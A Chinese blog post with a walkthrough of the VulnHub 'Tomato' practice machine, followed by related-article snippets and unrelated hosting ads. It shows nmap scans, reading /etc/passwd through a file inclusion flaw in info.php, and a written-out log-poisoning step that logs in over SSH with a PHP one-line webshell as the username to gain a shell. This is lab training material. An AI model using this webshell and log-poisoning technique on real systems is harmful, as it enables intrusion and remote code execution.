tomato 靶场

最新推荐文章于 2025-06-04 17:27:29 发布
最新推荐文章于 2025-06-04 17:27:29 发布
阅读量634 收藏 7
点赞数 9
文章标签: 服务器 网络 运维
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/weixin_63988455/article/details/140777883
版权

1.主机发现  扫描ip及端口

2.端口扫描 nmap192.168.233.131  有三个开放的端口nmap -sC -sV -O  192.168.233.131

-sC常见漏洞脚本扫描 -sV开放端口服务/版本号 -O操作系统探测

3.目录扫描

DIRECTORY: http://192.168.233.131/antibot_image/
+ http://192.168.233.131/index.html (CODE:200|SIZE:652)                     
+ http://192.168.233.131/server-status (CODE:403|SIZE:280)  

namp没全扫出来

4.访问192.168.233.131:8888 发现有个登录框 但是没啥子用

5.访问antibot_image目录 http://192.168.233.131/antibot_image/

继续访问一下antibots/目录 感觉这个跟爬虫的差不多

这个info.php

6.查看info.php的网页源码,发现存在文件包含漏洞

7.在URL后面输入 ?image=/etc/passwd (用image参数传入想要获取的文件路径)

成功显示,说明存在文件包含漏洞

看这个发现端口没全部扫出来  再用这个扫一下nmap -A 192.168.233.131 -p-

-A: 这个选项启用了“侵略性扫描”,包括操作系统检测、版本检测、脚本扫描和跟踪路由等功能。侵略性扫描通常会提供更多的信息,但也可能引起目标系统的注意。

-p-: 这个选项告诉 nmap 扫描目标系统上的所有可能的端口。扫描所有端口可能会耗费一定的时间,但可以全面了解目标系统上开放的哪些端口,以及哪些端口可能存在漏洞。

还有个2211端口 可以ssh

ssh "<?php @eval($_POST['cmd']);?>"@192.168.233.131 -p 2211

然后在网页端查看ubuntu报错信息:/var/log/auth.log

/var/log/auth.log 记录了所有和用户认证相关的日志 。无论是我们通过 ssh 登录,还是通过 sudo 执行命令都会在 auth.log 中产生记录。

成功getshell
                        

starhei.zxy
关注
vulnhub靶场-tomato渗透测试
m0_62750315的博客
09-08 1665
小白学渗透
VulnHub渗透测试实战靶场 - Tomato
m0_74215510的博客
04-27 1576
靶机名称:tomato 靶机难度:中等到困难 虚拟机环境:VMware Workstation 15.x Pro(此靶机推荐使用VMware搭建) 目标:获取root shell,即(root@localhost:~#),然后获取/root下的flag 靶机地址:https://download.vulnhub.com/tomato/Tomato.ova
tomato靶场复现
m0_68471358的博客
08-03 532
在多次尝试后,发现/var/log/auth.log中记录了FTP和SSH的登录服务,我们使用root和root123123123123123账户尝试ssh登录,可以看到被写入到了auth.log日志文件中,如果我们换成一句话木马内容,并且写入到此日志文件中,就可以使用系统目前的文件包含漏洞加载此日志文件,加载一句话木马。include语句会获取指定文件中存在的所有文本/代码/标记,文件包含函数加载的参数没有经过过滤或者严格的定义,可以被用户控制,包含其他恶意文件,导致了执行了非预期的代码。
【打靶】Tomato靶场
qq_59119347的博客
11-05 1447
那么我们可以试试包含日志,如果日志中, 存在有 php 代码也可以引入到文件包含中,如果日志有 php 恶意代码也可导致 getshell。在nmap扫描的时候已经知道是liunx操作系统,直接包含/etc/passwd发现有回显,看来就是有文件包含漏洞。‌:Apache的日志文件,记录HTTP请求信息。‌:MariaDB的日志文件,记录数据库操作信息。‌:MySQL的日志文件,记录数据库操作信息。‌:Nginx的日志文件,记录HTTP请求信息。‌:内核日志,记录内核启动和运行时的信息。
Tomato靶场复现
Zx244349115的博客
11-09 1684
希望你可以第二遍自己不看教程,刷一遍该靶场
tomato靶场攻略
kknifek的博客
09-04 496
1.使用nmap扫描同网段的端口,发现靶机地址 2.访问到主页面,只能看到一个大西红柿 3.再来使用dirb扫面以下有那些目录,发现有一个antibot_image 4.访问我们扫到的地址 ,点金目录里看看有些什么文件 5.看到info.php很熟悉,点进去看看 6.查看源代码发现是通过GET方式传参的 ,有文件包含漏洞 7. 利用文件包含漏洞,我们尝试查看一下passwd文件内容,可以成功 8.再来看看日志文件发现记录了ssh登录的登录日志,利用这个机
tomato靶场教程
2301_78889930的博客
03-12 355
什么是文件包含漏洞呢?原理:包含可以代码执行的文件(php可以文件读取,也可能造成命令执行)这个漏洞最重要的有四个函数:1、include:找不到文件产生警告,脚本继续运行。2、include_once:相对于include,文件被包含后不会再次被包含。3、require:找不到文件,产生致命错误,脚本停止。4、require_once:相对于require,文件被包含后不会再次被包含。
tomato靶场
weixin_63792060的博客
12-20 183
在扫描中我们发现/antibot_image/路径。所以上面扫描到的2211端口应该是ssh。未发现有价值的目录,尝试换个字典再试试。使用SecLists字典进行目录遍历。image函数就是可以包含其他文件。打开靶机后使用kali发现其ip。中记录了FTP和SSH的登录服务。在phpinfo页面查看源代码。使用kali写入一句话木马。发现info.php。
tomato靶场通关攻略
2302_77944815的博客
09-05 186
'@ip地址 -p 2211。5.每个文件都点开看看,发现info.php文件源代码有文件包含漏洞。2.访问8888端口出现一个弹窗但我们并没有账号密码。4.进入antibot_image,点击文件。6.利用漏洞读取一下etc下passwd文件。1.在kali用nmap扫描靶机端口。3.利于dirb工具进行目录扫描。7.尝试远程连接写入木马。8.尝试使用蚁剑连接。
tomato靶场打靶过程
qq_64703089的博客
08-02 631
本次打靶利用的是文件包含漏洞包含日志GetShell,通过写入错误登录信息连接shell。
tomato靶场获得shell
m0_74214882的博客
08-02 501
2211端口后面有用。
Vulnhub篇Tomato.zip
01-12
主要包括两部分,一部分是tomato的学习笔记过程,另一部分是,过程中使用到文件,供大家学习参考。
Vulnhub靶机tomato渗透
xingjinhao123的博客
02-26 1460
靶机介绍 官方下载地址:http://www.vulnhub.com/entry/tomato-1,557/ 该靶机目标是获取root目录下的flag,难度是中等到困难 运行环境: 靶机:网络连接方式设为自动桥接,IP地址:192.168.1.86 攻击机:通网段下的kali linux,IP地址:192.168.1.44 开始渗透 运行靶机 获取IP地址 扫描端口及其服务 扫描目录 开始访问 80端口首页是一张图片,源代码也没有获取有用的信息 server-status是一个目录 antibo
VulnHub Tomato
weixin_45682839的博客
10-27 2309
涉及知识:主机存活扫描、端口服务探测、WEB信息搜集、目录搜索、文件包含漏洞,日志写入webshell、linux本地提权
服务器租用:高防CDN和加速CDN的区别
wanhengidc的博客
06-03 240
加速CDN的主要功能则是实现内容的快速分发和高效加速,通过构建庞大且广泛分布的服务器节点网络,将网站或者是应用的静态内容缓存到离用户最近的节点服务器当中,以此缩短数据传输的距离和时间,让用户能够快速访问到所需的数据信息,极大的提高了用户的体验感。CDN全称为内容分发网络,其主要的作用原理能够加快网站的数据传输的速度,随着技术的快速发展,CDN也分为高防CDN和加速CDN两种不同的类型,本文将为大家介绍一下高防CDN和加速CDN两者之间的区别有哪些?
python集成inotify-rsync实现跨服务器文件同步
alex1801
06-01 524
摘要:本文介绍了一个基于Python watchdog库与rsync命令的文件同步监控工具。该系统通过watchdog监控源目录的文件变更(创建/修改/删除/移动),将变更收集到待处理队列,并设置1秒延迟合并多次操作。采用rsync实现增量同步,支持--delete保持目录一致性和--exclude排除特定文件。环境准备包括安装rsync/watchdog及配置SSH免密登录。核心代码展示了事件处理、命令构建和同步执行逻辑,提供初始同步选项,实现了高效可靠的自动化文件同步方案。(149字)
服务器中僵尸网络攻击是指什么?
wanhengidc的博客
06-04 143
攻击者能够通过恶意的病毒软件感染服务器或者是硬件设备,将其植入恶意代码,让其成为僵尸网络的一部分,恶意攻击者可以远程控制这些被感染的设备,传统的僵尸网络是由一台僵尸服务器或多个僵尸客户端多组成的,攻击者可以利用这些服务器发起大规模的网络攻击,给企业带来巨大的经济损失。僵尸网络主要是指采用一种或者是多种传播手段,让大量的主机服务器感染上僵尸程序病毒,从而形成一个一对多控制的网络,僵尸网络具有着很高的灵活性与泛用性,通常是恶意攻击常用的手段之一。
stress-ng 服务器压力测试的工具学习
最新发布
qq_50247813的博客
06-04 548
项目地址:https://github.com/ColinIanKing/stress-ngstress-ng 将以多种可选方式对计算机系统进行压力测试。它旨在锻炼计算机的各种物理子系统以及各种操作系统内核接口。stress-ng 最初的设计目的是让机器高负荷运行,以触发硬件问题(如热过载)以及仅在系统被高强度使用时才会出现的操作系统错误。使用 stress-ng 需谨慎,因为某些测试可能导致设计不良的硬件系统过热,并可能引发难以停止的过度系统抖动。stress-ng 还可以测量测试吞吐率;
联通专线赋能,亿林网络裸金属服务器:中小企业 IT 架构升级优选方案
2501_91663411的博客
06-04 1066
在当今数字化飞速发展的时代,中小企业面临着日益增长的业务需求与复杂多变的市场竞争环境。如何构建高效、稳定且具性价比的 IT 架构,成为众多企业突破发展瓶颈的关键所在。而亿林网络推出的 24 核 32G 裸金属服务器,搭配联通专线的千兆共享带宽,宛如为中小企业量身打造的一把“利刃”,精准切入痛点,助力企业腾飞。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值